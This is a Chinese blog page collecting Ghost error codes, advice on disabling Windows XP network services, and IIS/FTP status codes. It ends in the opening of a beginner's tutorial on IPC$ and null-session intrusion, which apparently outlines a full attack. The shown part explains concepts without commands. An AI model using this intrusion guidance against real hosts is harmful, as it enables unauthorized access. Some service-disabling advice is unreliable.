|
|
用户名:beilang98 笔名:BeiLang 地区: 菊花论坛 行业:其他 |
| 日 | 一 | 二 | 三 | 四 | 五 | 六 |
欢迎您访问 BeiLang BlogBus 的博客 同时也欢迎您访问“菊花论坛” http://www.sharecenter.net/index.php
路由和远程访问服务的事件 ID 列表
Ghost错误代码
使用Ghost时,发生错误,Ghost会返回一个错误代码给用户,很多人并不知道代码的意思。现在我们把它们一一列出,供大家在使用中参考,以做到对症下药,排除故障。
错误代码: 10000
原因或对策:不正确的路径/文件语法。请确保路径及文件名是否正确,同时确定如
果你正在网络上建立映像文件你是否有写权限。
错误代码: 10001
原因或对策:使用者放弃了操作。
错误代码: 10060
原因或对策:读取了坏的来源文件或磁盘。检查磁盘或映像文件是否有问题,网络是否有冲突,光驱是否有了问题。
错误代码: 10082
原因或对策:Ghost的共享版本已过期,必须购买才能够使用。
错误代码: 10170
原因或对策:拒绝检查映像文件或磁盘。请使用更新的版本以解决此问题。
错误代码: 10180
原因或对策:硬盘没有响应。请检查电缆线、电源连接、跳线及基本输出入单元(BIOS)设置。确定你的系统已经由FDISK给硬盘正确分了区。
错误代码: 10210
原因或对策:无效的扩充分区信息,可能你的硬盘分区已经被硬盘压缩软件压缩。如果它们是由此类型的驱动器所控制,Ghost无法完全将硬盘定位。请先把分区解压缩,再执行Ghost程序。
错误代码: 10220
原因或对策:返回这个错误代码,是因为你正在Windows的DOS窗口下执行Ghost程序。请试着在纯DOS下使用Ghost,最好用DOS盘启动机器,然后再执行Ghost程序。
错误代码: 10600
原因或对策:Ghost无法适当地继续由于缺乏内存,请参阅下面15040错误代码。
错误代码: 11000
原因或对策:无效的备份映像文件,请重新指定备份映像文件。
错误代码: 12080
原因或对策:一般是企图在网络之上克隆磁盘对磁盘所致。Ghost仅仅能够通过NetBIOS协议在网络上进行磁盘对磁盘克隆操作。
错误代码: 12090
原因或对策:读取或写入硬盘发生错误,请尝试先扫描硬盘,并修复操作再执行Ghost。
错误代码: 14030
原因或对策:未注册的Ghost版本遭遇文件的日期超过它的终止日期,请购买新的Ghost版本。
错误代码: 15010 15020 15030 15050
原因或对策:返回此类错误代码,可以试着使用Ghost -E去避免此类错误。
错误代码: 15040
原因或对策:执行Ghost时内存不够,请确认在config.sys中已经加入以下语句:
device=himem.sys
错误代码: 15100
原因或对策:使用Ghost -OR去拒绝检查或更新到最新的版本以解决此难题。
错误代码: 15150
原因或对策:可能是已经损坏的映像文件,请先使用Local→Check→Image File命令来检查一下映像文件的完整性。
错误代码: 15165
原因或对策:Ghost在存取网络上的文件或硬盘时发生问题,请检查你的网络设备或者使用最新版本的Ghost解决此难题。
错误代码: 15170
原因或对策:来源硬盘未格式化或遇到了无效的分区。请确定来源硬盘已经被正确分区。
错误代码: 15175
原因或对策:在Compaq机器上运行时可能产生的问题,请使用最新版本的Ghost。
错误代码: 16040
原因或对策:你的硬盘上有太多的分区。
错误代码: 19080
原因或对策:大部分或许是Ghost存取的目录或文件名称是无效的。
错误代码: 19320
原因或对策:Ghost由于缺乏内存无法执行,请参阅上面15040错误信息。
错误代码: 30004
原因或对策:读入加密过的映像文件时用户提供的密码不正确,无法使用映像文件。
脚本资料
WinXP/2003网络服务详解
1.Application Layer Gateway Service
ALG(应用层网关)。为Internet连接共享和Internet连接防火墙提供第三方协议插件的支持。该服务进程名为Alg.exe。
依存关系:Internet Connection Firewall(ICF)/Internet Connection Sharing(ICS)
建议:如果你不使用因特网联机共享(ICS)提供多台计算机的因特网存取和因特网联机防火墙(ICF)软件,停止。
2.Background Intelligent Transfer Service
BITS(后台智能传输服务
依存关系:Remote Procedure Call(RPC)和 Workstation
建议:该服务的应用即是实现支持Windows自动更新时的断点续传,根据Automatic Updates服务的具体情况,启动。
3.Computer Browser
Browser(计算机浏览器服务)。维护网络上计算机的更新列表,并将列表提供给计算机指定浏览。该服务进程名为Svchost.exe。
依存关系:Server 和 Workstation
建议:一般家用计算机涉及不到,除非你的计算机位于局域网内,停止。
4.DHCP Client
Dhcp(DHCP客户端服务)。通过注册和更改IP地址以及DNS名称来管理网络配置。简单地讲,DHCP就是由网络中的一台主机将所有的网络参数自动分配给网络内的任何一如计算机,而DHCP客户端就是网络中被分配网络参数的对象计算机。该服务进程名为Svchost.exe。
依存关系:AFD网络支持环境、SYMTDI、TCP/IP Protocol Driver和NetBIOS over TCP/IP
建议:如果你的机器能在网络中被自动分配IP地址等参数,停止。对于家庭用户来讲,只要是使用DSL/Cable上网,开启ICS和IPSEC服务的,都需要这个服务来指定静态IP,启动。
5.Distributed Link Tracking Client
TrkWks(分布式连结追踪客户端服务)。在计算机内NTFS文件之间保持链接或在网络域中的计算机之间保持链接。该服务进程名为Svchost.exe。
依存关系:Remote Procedure Call(RPC)
建议:对于不在局域网中的用户,停止。
6.DNS Client
Dnscache(DNS 客户端服务)。为此计算机解析和缓冲域名系统(DNS)名称。该服务进程名为Svchost.exe。
依存关系:TCP/IP Protocol Driver
建议:事实上,一个网站并不是只有一台服务器在工作,基于安全性考虑,停止。
7.Messenger
Messenger(信使服务)。传输客户端和服务器之间的NET SEND和Alerter服务消息。此服务与Windows Messenger无关。该服务进程名为Svchost.exe。
依存关系:NetBIOS Interface、Plug and Play、Remote Procedure Call(RPC)、Workstation
建议:基于安全性考虑,停止。
8.Net Logon
Net Logon(网域登录服务)。支持网络计算机pass-through 账户登录身份验证事件。该服务进程名为Lsass.exe。
依存关系:Workstation
建议:如果要使用网内的域服务器登录到域网时,启动。
9.NetMeeting Remote Desktop Sharing
Mnmsrvc(NetMeeting 远程桌面共享)。允许经过授权的用户使用NetMeeting在公司Intranet 上远程访问这台计算机。该服务进程名为Mnmsrvc.exe
依存关系:Remote Procedure Call(RPC)
建议:视具体情况,停止,但关闭它后,远程桌面共享功能将无法使用。
10.Network Connections
Netman(网络联机)。管理“网络和拨号连接”文件夹中对象,在其中你可以查看局域网和远程连接。该服务进程名为Svchost.exe。
依存关系:Remote Procedure Call(RPC)、Internet Connection Firewall(ICF)/ Internet Connection Sharing(ICS)
建议:关闭它之后,在“网络和拨号连接”对话框中将什么也看不到,更不用说新建连接和拨号上网了,因此除非你的机器是绝对的单机环境,启动。
11.Network DDE
NetDDE(网络动态数据交换服务)。为在同一台算机或不同计算机上运行的程序提供动态数据交换(DDE)的网络传输和安全。该服务进程名为Netdde.exe。
依存关系:Network DDE DSDM、ClipBook
建议:如无需ClipBook服务,停止。
12.Network DDE DSDM
NetDDE dsdm(网络动态数据交换网络共享服务)。管理动态数据交换(DDE)网络共享。该服务进程名为Netdde.exe。
依存关系:Network DDE
建议:如无需Network DDE服务,停止。
13.Network Location Awareness
NLA(网络位置识别服务)。收集并保存网络配置信息,并在信息改动时通知应用程序。该服务进程名为Svchost.exe。
依存关系:AFD网络支持环境、TCP/IP Procotol Driver、Internet Connection Firewall(ICF)/ Internet Connection Sharing(ICS)
建议:对于移动办公用户,启动。
14.NT LM Security Support Provider
NtlmSsp(NT LM安全性支持提供者服务
依存关系:Telnet
建议:如果不使用Message Queuing或Telnet Server服务,停止。
15.QoS RSVP
RSVP(QoS许可控制服务)。为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。该服务进程名为Rsvp.exe。
依存关系:AFD网络支持环境、TCP/IP protocol Driver、Remote Procedure Call(RPC)
建议:用来保留20%带宽的服务,如果你的网络卡不支持802.1P或在你计算机的网络中没有ACS server,停止。
16.Remote Access Auto Connection Manager
RasAuto(远程访问自动联机管理员服务)。无论什么时候当某个程序引用一个远程DNS、NetBIOS名或地址就创建一个到远程网络的连接。该服务进程名为Svchost.exe。
依存关系:Remote Access Connection Manager、Telephony
建议:如果你的机器提供网络共享服务就启动它,以避免网络断线后手动连接,否则停止。
17.Remote Access Connection Manager
RasMan(远程访问联机管理员服务)。创建网络连接。该服务进程名为Svchost.exe。
依存关系:Telephony、Internet Connection Firewall(ICF)/ Internet Connection Sharing(ICS)、Remote Access Auto Connection Manager
建议:根据具体情况而定。
18.Remote Desktop Help Session Manager
RDSessMgr(远程桌面协助服务)。管理并控制远程协助。如果此服务被终止,远程协助将不可用。终止此服务前,请参见“属性”对话框上的“依存”选项卡。该服务进程名为Sessmgr.exe。
依存关系:Remote Procedure Call(RPC)
建议:用于管理和控制远程协助,如果不使用可以停止。
19.Remote Procedure Call(RPC)
RpcSs(远程过程调用)。提供终结点映射程序(endpoint mapper)以及其他RPC服务。该服务进程名为Svchost.exe。
依存关系:相当多的服务均依赖于它的运行
建议:很多服务都需要依存它运行,启动。
20.Remote Procedure Call(RPC)Locator
RpcLocator(远程过程调用定位服务)。管理RPC名称服务数据库。通过它对RPC的命名管理,调用者才能找到被调用者的位置。该服务进程名为Locator.exe。
依存关系:Workstation
建议:由于系统注册表的存在,使用命名管理并无实际意义,停止。
21.Routing and Remote Access
RemoteAccess(路由和远程访问服务)。在局域网以及广域网环境中提供路由服务。该服务进程名为Svchost.exe。
依存关系:Remote Procedure Call(RPC)、NetBIOSGroup
建议:提供拨号联机到广域网或是VPN服务,一般用户使用不到,停止。
22.Secondary Logon
Seclogon(二次登录服务)。在多用户使用的计算机上,某些用户因为是非管理员权限,导致某些程序无法执行。为了让没有管理员权限的已登录用户可以使用这个程序,Windows XP设计了这个功能来分配临时的管理员权限。该服务进程名为Svchost.exe。
依存关系:无
建议:基于安全性考虑,停止。
23.Server
lanmanserver(服务器服务)。支持此计算机通过网络的文件、打印、和命名管道共享。如果服务停止,这些功能不可用。该服务进程名为Svchost.exe。
依存关系:Computer Browser
建议:如果没有与其他计算机分享的需要,停止。
24.TCP/IP NetBIOS Helper
LmHosts(TCP/IP NetBIOS助手服务)。允许对“TCP/IP 上 NetBIOS(NetBT)”服务以及NetBIOS名称解析的支持。该服务进程名为Svchost.exe。
依存关系:AFD 网络支持环境、NetBios Over TCP/IP
建议:如果你的网络不使用NetBIOS或是WINS,停止。
25.Telnet
TlntSvr(远程登录服务)。允许远程用户登录到此计算机并运行程序,并支持多种TCP/IP Telnet客户,包括基于UNIX和Windows的计算机。该服务进程名为Tlntsvr.exe。
依存关系:NT LM Security Support Provider、Remote Procedure Call(RPC)、TCP/IP Protocol Driver
建议:基于安全性考虑,如无特别需求,停止。
26.Terminal Services
TermService(终端机服务)。允许多用户连接并控制一台计算机,并且在远程计算机上显示桌面和应用程序。该服务进程名为Svchost.exe。
依存关系:Remote Procedure Call(RPC)、Fast User Switching Compatibility、InteractiveLogon
建议:远程桌面或是远程协助的功能,如无特别需求,停止。
27.Workstation
Lanmanworkstation(工作站服务)。创建和维护到远程服务的客户端网络连接。该服务进程名为Svchost.exe。
依存关系:Alerter、Background Intelligent Transfer Service、Computer Browser、Messenger、Net Logon、Remote Procedure Call(RPC)Locator
建议:Internet网联机所必需的一些功能,启动。
MYSQL出错代码列表
asp中错误代码的具体含义
IIS 状态代码&FTP错误代码
IIS 状态代码
概要
当用户试图通过 HTTP 或文件传输协议 (FTP) 访问一台正在运行 Internet 信息服务 (IIS) 的服务器上的内容时,IIS 返回一个表示该请求的状态的数字代码。该状态代码记录在 IIS 日志中,同时也可能在 Web 浏览器或 FTP 客户端显示。状态代码可以指明具体请求是否已成功,还可以揭示请求失败的确切原因
更多信息
日志文件的位置
在默认状态下,IIS 把它的日志文件放在 %WINDIR\\System32\\Logfiles 文件夹中。每个万维网 (WWW) 站点和 FTP 站点在该目录下都有一个单独的目录。在默认状态下,每天都会在这些目录下创建日志文件,并用日期给日志文件命名(例如,exYYMMDD.log)。
HTTP
1xx - 信息提示
这些状态代码表示临时的响应。客户端在收到常规响应之前,应准备接收一个或多个 1xx 响应。
• 100 - 继续。
• 101 - 切换协议。
2xx - 成功
这类状态代码表明服务器成功地接受了客户端请求。
• 200 - 确定。客户端请求已成功。
• 201 - 已创建。
• 202 - 已接受。
• 203 - 非权威性信息。
• 204 - 无内容。
• 205 - 重置内容。
• 206 - 部分内容。
3xx - 重定向
客户端浏览器必须采取更多*作来实现请求。例如,浏览器可能不得不请求服务器上的不同的页面,或通过代理服务器重复该请求。
• 302 - 对象已移动。
• 304 - 未修改。
• 307 - 临时重定向。
4xx - 客户端错误
发生错误,客户端似乎有问题。例如,客户端请求不存在的页面,客户端未提供有效的身份验证信息。
• 400 - 错误的请求。
• 401 - 访问被拒绝。IIS 定义了许多不同的 401 错误,它们指明更为具体的错误原因。这些具体的错误代码在浏览器中显示,但不在 IIS 日志中显示:
• 401.1 - 登录失败。
• 401.2 - 服务器配置导致登录失败。
• 401.3 - 由于 ACL 对资源的限制而未获得授权。
• 401.4 - 筛选器授权失败。
• 401.5 - ISAPI/CGI 应用程序授权失败。
• 401.7 – 访问被 Web 服务器上的 URL 授权策略拒绝。这个错误代码为 IIS 6.0 所专用。
• 403 - 禁止访问:IIS 定义了许多不同的 403 错误,它们指明更为具体的错误原因:
• 403.1 - 执行访问被禁止。
• 403.2 - 读访问被禁止。
• 403.3 - 写访问被禁止。
• 403.4 - 要求 SSL。
• 403.5 - 要求 SSL 128。
• 403.6 - IP 地址被拒绝。
• 403.7 - 要求客户端证书。
• 403.8 - 站点访问被拒绝。
• 403.9 - 用户数过多。
• 403.10 - 配置无效。
• 403.11 - 密码更改。
• 403.12 - 拒绝访问映射表。
• 403.13 - 客户端证书被吊销。
• 403.14 - 拒绝目录列表。
• 403.15 - 超出客户端访问许可。
• 403.16 - 客户端证书不受信任或无效。
• 403.17 - 客户端证书已过期或尚未生效。
• 403.18 - 在当前的应用程序池中不能执行所请求的 URL。这个错误代码为 IIS 6.0 所专用。
• 403.19 - 不能为这个应用程序池中的客户端执行 CGI。这个错误代码为 IIS 6.0 所专用。
• 403.20 - Passport 登录失败。这个错误代码为 IIS 6.0 所专用。
• 404 - 未找到。
• 404.0 -(无) – 没有找到文件或目录。
• 404.1 - 无法在所请求的端口上访问 Web 站点。
• 404.2 - Web 服务扩展锁定策略阻止本请求。
• 404.3 - MIME 映射策略阻止本请求。
• 405 - 用来访问本页面的 HTTP 谓词不被允许(方法不被允许)
• 406 - 客户端浏览器不接受所请求页面的 MIME 类型。
• 407 - 要求进行代理身份验证。
• 412 - 前提条件失败。
• 413 – 请求实体太大。
• 414 - 请求 URI 太长。
• 415 – 不支持的媒体类型。
• 416 – 所请求的范围无法满足。
• 417 – 执行失败。
• 423 – 锁定的错误。
5xx - 服务器错误
服务器由于遇到错误而不能完成该请求。
• 500 - 内部服务器错误。
• 500.12 - 应用程序正忙于在 Web 服务器上重新启动。
• 500.13 - Web 服务器太忙。
• 500.15 - 不允许直接请求 Global.asa。
• 500.16 – UNC 授权凭据不正确。这个错误代码为 IIS 6.0 所专用。
• 500.18 – URL 授权存储不能打开。这个错误代码为 IIS 6.0 所专用。
• 500.100 - 内部 ASP 错误。
• 501 - 页眉值指定了未实现的配置。
• 502 - Web 服务器用作网关或代理服务器时收到了无效响应。
• 502.1 - CGI 应用程序超时。
• 502.2 - CGI 应用程序出错。application.
• 503 - 服务不可用。这个错误代码为 IIS 6.0 所专用。
• 504 - 网关超时。
• 505 - HTTP 版本不受支持。
常见的 HTTP 状态代码及其原因
• 200 - 成功。 此状态代码表示 IIS 已成功处理请求。
• 304 - 未修改。 客户端请求的文档已在其缓存中,文档自缓存以来尚未被修改过。客户端使用文档的缓存副本,而不从服务器下载文档。
• 401.1 - 登录失败。 登录尝试不成功,可能因为用户名或密码无效。
• 401.3 - 由于 ACL 对资源的限制而未获得授权。 这表示存在 NTFS 权限问题。即使您对试图访问的文件具备相应的权限,也可能发生此错误。例如,如果 IUSR 帐户无权访问 C:\\Winnt\\System32\\Inetsrv 目录,您会看到这个错误。 有关如何解决此问题的其他信息,请单击下面的文章编号,查看 Microsoft 知识库中相应的文章:
187506 INFO: IIS 4.0 的基础 NTFS 权限
• 403.1 - 执行访问被禁止。 下面是导致此错误信息的两个常见原因:
• 您没有足够的执行许可。例如,如果试图访问的 ASP 页所在的目录权限设为“无”,或者,试图执行的 CGI 脚本所在的目录权限为“只允许脚本”,将出现此错误信息。若要修改执行权限,请在 Microsoft 管理控制台 (MMC) 中右击目录,然后依次单击属性和目录选项卡,确保为试图访问的内容设置适当的执行权限。
• 您没有将试图执行的文件类型的脚本映射设置为识别所使用的谓词(例如,GET 或 POST)。若要验证这一点,请在 MMC 中右击目录,依次单击属性、目录选项卡和配置,然后验证相应文件类型的脚本映射是否设置为允许所使用的谓词。
• 403.2 - 读访问被禁止。验证是否已将 IIS 设置为允许对目录进行读访问。另外,如果您正在使用默认文件,请验证该文件是否存在。 有关如何解决此问题的其他信息,请单击下面的文章编号,查看 Microsoft 知识库中相应的文章:
247677 错误信息:403.2 Forbidden:Read Access Forbidden(403.2 禁止访问:读访问被禁止)
• 403.3 - 写访问被禁止。 验证 IIS 权限和 NTFS 权限是否已设置以便向该目录授予写访问权。有关如何解决此问题的其他信息,请单击下面的文章编号,查看 Microsoft 知识库中相应的文章:
248072 错误信息:403.3 Forbidden:Write Access Forbidden(403.3 禁止访问:写访问被禁止)
• 403.4 - 要求 SSL。禁用要求安全通道选项,或使用 HTTPS 代替 HTTP 访问该页面。如果没有安装证书的 Web 站点出现此错误,请单击下面的文章编号,查看 Microsoft 知识库中相应的文章:
224389 错误信息:HTTP 错误 403、403.4、403.5 禁止访问:要求 SSL
• 403.5 - 要求 SSL 128。禁用要求 128 位加密选项,或使用支持 128 位加密的浏览器以查看该页面。如果没有安装证书的 Web 站点出现此错误,请单击下面的文章编号,查看 Microsoft 知识库中相应的文章:
224389 错误信息:HTTP 错误 403、403.4、403.5 禁止访问:要求 SSL
• 403.6 - IP 地址被拒绝。您已把您的服务器配置为拒绝访问您目前的 IP 地址。 有关如何解决此问题的其他信息,请单击下面的文章编号,查看 Microsoft 知识库中相应的文章:
248043 错误信息:403.6 - Forbidden:IP Address Rejected(403.6 - 不可用:IP 地址被拒绝)
• 403.7 - 要求客户端证书。您已把您的服务器配置为要求客户端身份验证证书,但您未安装有效的客户端证书。 有关其他信息,请单击下面的文章编号,查看 Microsoft 知识库中相应的文章:
190004 错误 403.7 或“Connection to Server Could Not Be Established”(无法建立与服务器的连接)
186812 PRB:错误信息:403.7 Forbidden:Client Certificate Required(403.7 禁止访问:要求客户端证书)
• 403.8 - 站点访问被拒绝。您已为您用来访问服务器的域设置了域名限制。有关如何解决此问题的其他信息,请单击下面的文章编号,查看 Microsoft 知识库中相应的文章:
248032 错误信息:Forbidden:Site Access Denied 403.8(禁止访问:站点访问被拒绝 403.8)
• 403.9 - 用户数过多。与该服务器连接的用户数量超过了您设置的连接限制。 有关如何更改此限制的其他信息,请单击下面的文章编号,以查看 Microsoft 知识库中相应的文章:
248074 错误信息:Access Forbidden:Too Many Users Are Connected 403.9(禁止访问:连接的用户太多 403.9)
注意:Microsoft Windows 2000 Professional 和 Microsoft Windows XP Professional 自动设置了在 IIS 上最多 10 个连接的限制。您无法更改此限制。
• 403.12 - 拒绝访问映射表。 您要访问的页面要求提供客户端证书,但映射到您的客户端证书的用户 ID 已被拒绝访问该文件。 有关其他信息,请单击下面的文章编号,以查看 Microsoft 知识库中相应的文章:
248075 错误信息:HTTP 403.12 - Access Forbidden:Mapper Denied Access(HTTP 403.12 - 禁止访问:映射表拒绝访问)
• 404 - 未找到。 发生此错误的原因是您试图访问的文件已被移走或删除。如果在安装 URLScan 工具之后,试图访问带有有限扩展名的文件,也会发生此错误。这种情况下,该请求的日志文件项中将出现“Rejected by URLScan”的字样。
• 500 - 内部服务器错误。 很多服务器端的错误都可能导致该错误信息。事件查看器日志包含更详细的错误原因。此外,您可以禁用友好 HTTP 错误信息以便收到详细的错误说明。 有关如何禁用友好 HTTP 错误信息的其他信息,请单击下面的文章编号,以查看 Microsoft 知识库中相应的文章:
294807 如何在服务器端禁用 Internet Explorer 5 的“显示友好 HTTP 错误信息”功能
• 500.12 - 应用程序正在重新启动。 这表示您在 IIS 重新启动应用程序的过程中试图加载 ASP 页。刷新页面后,此信息即会消失。如果刷新页面后,此信息再次出现,可能是防病毒软件正在扫描 Global.asa 文件。 有关其他信息,请单击下面的文章编号,以查看 Microsoft 知识库中相应的文章:
248013 错误信息:HTTP Error 500-12 Application Restarting(HTTP 错误 500-12 应用程序正在重新启动)
• 500-100.ASP - ASP 错误。 如果试图加载的 ASP 页中含有错误代码,将出现此错误信息。若要获得更确切的错误信息,请禁用友好 HTTP 错误信息。默认情况下,只会在默认 Web 站点上启用此错误信息。有关如何在非默认的 Web 站点上看到此错误信息的其他信息,请单击下面的文章编号,以查看 Microsoft 知识库中相应的文章:
261200 显示 HTTP 500 错误信息,而不显示 500-100.asp 的 ASP 错误信息
• 502 - 网关错误。 如果试图运行的 CGI 脚本不返回有效的 HTTP 标头集,将出现此错误信息。
FTP
1xx - 肯定的初步答复
这些状态代码指示一项*作已经成功开始,但客户端希望在继续*作新命令前得到另一个答复。
• 110 重新启动标记答复。
• 120 服务已就绪,在 nnn 分钟后开始。
• 125 数据连接已打开,正在开始传输。
• 150 文件状态正常,准备打开数据连接。
2xx - 肯定的完成答复
一项*作已经成功完成。客户端可以执行新命令。
• 200 命令确定。
• 202 未执行命令,站点上的命令过多。
• 211 系统状态,或系统帮助答复。
• 212 目录状态。
• 213 文件状态。
• 214 帮助消息。
• 215 NAME 系统类型,其中,NAME 是 Assigned Numbers 文档中所列的正式系统名称。
• 220 服务就绪,可以执行新用户的请求。
• 221 服务关闭控制连接。如果适当,请注销。
• 225 数据连接打开,没有进行中的传输。
• 226 关闭数据连接。请求的文件*作已成功(例如,传输文件或放弃文件)。
• 227 进入被动模式 (h1,h2,h3,h4,p1,p2)。
• 230 用户已登录,继续进行。
• 250 请求的文件*作正确,已完成。
• 257 已创建“PATHNAME”。
3xx - 肯定的中间答复
该命令已成功,但服务器需要更多来自客户端的信息以完成对请求的处理。
• 331 用户名正确,需要密码。
• 332 需要登录帐户。
• 350 请求的文件*作正在等待进一步的信息。
4xx - 瞬态否定的完成答复
该命令不成功,但错误是暂时的。如果客户端重试命令,可能会执行成功。
• 421 服务不可用,正在关闭控制连接。如果服务确定它必须关闭,将向任何命令发送这一应答。
• 425 无法打开数据连接。
• 426 Connection closed; transfer aborted.
• 450 未执行请求的文件*作。文件不可用(例如,文件繁忙)。
• 451 请求的*作异常终止:正在处理本地错误。
• 452 未执行请求的*作。系统存储空间不够。
5xx - 永久性否定的完成答复
该命令不成功,错误是永久性的。如果客户端重试命令,将再次出现同样的错误。
• 500 语法错误,命令无法识别。这可能包括诸如命令行太长之类的错误。
• 501 在参数中有语法错误。
• 502 未执行命令。
• 503 错误的命令序列。
• 504 未执行该参数的命令。
• 530 未登录。
• 532 存储文件需要帐户。
• 550 未执行请求的*作。文件不可用(例如,未找到文件,没有访问权限)。
• 551 请求的*作异常终止:未知的页面类型。
• 552 请求的文件*作异常终止:超出存储分配(对于当前目录或数据集)。
• 553 未执行请求的*作。不允许的文件名。
常见的 FTP 状态代码及其原因
• 150 - FTP 使用两个端口:21 用于发送命令,20 用于发送数据。状态代码 150 表示服务器准备在端口 20 上打开新连接,发送一些数据。
• 226 - 命令在端口 20 上打开数据连接以执行*作,如传输文件。该*作成功完成,数据连接已关闭。
• 230 - 客户端发送正确的密码后,显示该状态代码。它表示用户已成功登录。
• 331 - 客户端发送用户名后,显示该状态代码。无论所提供的用户名是否为系统中的有效帐户,都将显示该状态代码。
• 426 - 命令打开数据连接以执行*作,但该*作已被取消,数据连接已关闭。
• 530 - 该状态代码表示用户无法登录,因为用户名和密码组合无效。如果使用某个用户帐户登录,能键入错误的用户名或密码,也可能选择只允许匿名访问。如果使用匿名帐户登录,IIS 的配置可能拒绝匿名访问。
• 550 - 命令未被执行,因为指定的文件不可用。例如,要 GET 的文件并不存在,或试图将文件 PUT 到您没有写入权限的目录。
FTP错误代码
1xx - 肯定的初步答复
这些状态代码指示一项*作已经成功开始,但客户端希望在继续*作新命令前得到另一个答复。
• 110 重新启动标记答复。
• 120 服务已就绪,在 nnn 分钟后开始。
• 125 数据连接已打开,正在开始传输。
• 150 文件状态正常,准备打开数据连接。
2xx - 肯定的完成答复
一项*作已经成功完成。客户端可以执行新命令。
• 200 命令确定。
• 202 未执行命令,站点上的命令过多。
• 211 系统状态,或系统帮助答复。
• 212 目录状态。
• 213 文件状态。
• 214 帮助消息。
• 215 NAME 系统类型,其中,NAME 是 Assigned Numbers 文档中所列的正式系统名称。
• 220 服务就绪,可以执行新用户的请求。
• 221 服务关闭控制连接。如果适当,请注销。
• 225 数据连接打开,没有进行中的传输。
• 226 关闭数据连接。请求的文件*作已成功(例如,传输文件或放弃文件)。
• 227 进入被动模式 (h1,h2,h3,h4,p1,p2)。
• 230 用户已登录,继续进行。
• 250 请求的文件*作正确,已完成。
• 257 已创建“PATHNAME”。
3xx - 肯定的中间答复
该命令已成功,但服务器需要更多来自客户端的信息以完成对请求的处理。
• 331 用户名正确,需要密码。
• 332 需要登录帐户。
• 350 请求的文件*作正在等待进一步的信息。
4xx - 瞬态否定的完成答复
该命令不成功,但错误是暂时的。如果客户端重试命令,可能会执行成功。
• 421 服务不可用,正在关闭控制连接。如果服务确定它必须关闭,将向任何命令发送这一应答。
• 425 无法打开数据连接。
• 426 Connection closed; transfer aborted.
• 450 未执行请求的文件*作。文件不可用(例如,文件繁忙)。
• 451 请求的*作异常终止:正在处理本地错误。
• 452 未执行请求的*作。系统存储空间不够。
5xx - 永久性否定的完成答复
该命令不成功,错误是永久性的。如果客户端重试命令,将再次出现同样的错误。
• 500 语法错误,命令无法识别。这可能包括诸如命令行太长之类的错误。
• 501 在参数中有语法错误。
• 502 未执行命令。
• 503 错误的命令序列。
• 504 未执行该参数的命令。
• 530 未登录。
• 532 存储文件需要帐户。
• 550 未执行请求的*作。文件不可用(例如,未找到文件,没有访问权限)。
• 551 请求的*作异常终止:未知的页面类型。
• 552 请求的文件*作异常终止:超出存储分配(对于当前目录或数据集)。
• 553 未执行请求的*作。不允许的文件名。
常见的 FTP 状态代码及其原因
• 150 - FTP 使用两个端口:21 用于发送命令,20 用于发送数据。状态代码 150 表示服务器准备在端口 20 上打开新连接,发送一些数据。
• 226 - 命令在端口 20 上打开数据连接以执行*作,如传输文件。该*作成功完成,数据连接已关闭。
• 230 - 客户端发送正确的密码后,显示该状态代码。它表示用户已成功登录。
• 331 - 客户端发送用户名后,显示该状态代码。无论所提供的用户名是否为系统中的有效帐户,都将显示该状态代码。
• 426 - 命令打开数据连接以执行*作,但该*作已被取消,数据连接已关闭。
• 530 - 该状态代码表示用户无法登录,因为用户名和密码组合无效。如果使用某个用户帐户登录,可能键入错误的用户名或密码,也可能选择只允许匿名访问。如果使用匿名帐户登录,IIS 的配置可能拒绝匿名访问。
• 550 - 命令未被执行,因为指定的文件不可用。例如,要 GET 的文件并不存在,或试图将文件 PUT 到您没有写入权限的目录。
计算机网络协议及网络模型
计算机网络分类
关于ip地址
ipc$详细解读
目录 :
一 前言
二 什么是ipc$
三 什么是空会话
四 空会话可以做什么
五 ipc$连接所使用的端口
六 ipc$连接在hack攻击中的意义
七 ipc$连接失败的常见原因
八 复制文件失败的原因
九 如何打开目标的IPC$共享以及其他共享
十 一些需要shell才能完成的命令
十一 入侵中可能会用到的相关命令
十二 ipc$完整入侵步骤祥解
十三 如何防范ipc$入侵
十四 ipc$入侵问答精选
十五 结束的话
一 前言
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的种种迷惑(你随便找一个hack论坛搜一下ipc$,看看存在的疑惑有多少)。因此我参考了网上的一些资料,教程以及论坛帖子,写了这篇总结性质的文章,想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!
注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列,而鉴于win Xp在安全设置上有所提高,个别操作并不适用,有机会将单独讨论。
二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?
三 什么是空会话
在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建
立;
2)服务器产生一个随机的64位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结
果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢?
